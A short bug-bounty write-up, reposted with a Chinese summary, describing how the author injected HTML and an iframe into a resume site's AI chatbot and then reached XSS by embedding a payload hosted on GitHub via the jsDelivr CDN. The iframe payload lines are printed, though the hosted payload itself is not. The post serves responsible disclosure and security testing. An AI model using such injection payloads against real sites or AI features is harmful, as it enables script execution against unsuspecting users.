My first bounty from Hackerone | $100 Code Injection on AI bot
作者发现一个简历制作网站的漏洞并报告后加入其HackerOne计划。在测试中发现AI功能存在XSS漏洞,通过iframe注入和JSdelivr CDN托管payload成功利用。尽管实现攻击,但因未影响其他用户而担心漏洞不被接受。 2026-1-6 05:12:0 Author: infosecwriteups.com(查看原文) 阅读量:1 收藏

StvRoot

Another story time. Eh!

I found a very popular website which people use it to make resumes. I mailed them a bug (duplicate) and in reply they added me to their hackerone programme.

This was in September.

I tested it for days but nothing. Being an old programme all the corners were checked multiple times already.

On 16 th of December I got a mail saying an AI feature was introduced. I didnt pay much attention as I doubted my skills plus I was testing another one. After 30–45 mins something snapped and I started to throw paylaods at the AI bot :)

When I tested for html injection :

<h1>a</h1>
<iframe src="https://google.com"></iframe>

Iframe Injection worked. Then I used jsdelivery cdn to host my payload on github and embeded it in an iframe to get XSS.

Press enter or click to view image in full size

 <iframe src="https://cdn.jsdelivr.net/gh/ScarryParrot/testing@3XXXXXXc20/payload9.pdf"></iframe>

Although I was in a doubt it being accepted as it do not affect any other users.


文章来源: https://infosecwriteups.com/my-first-bounty-from-hackerone-100-code-injection-on-ai-bot-620a7e3f2ba4?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh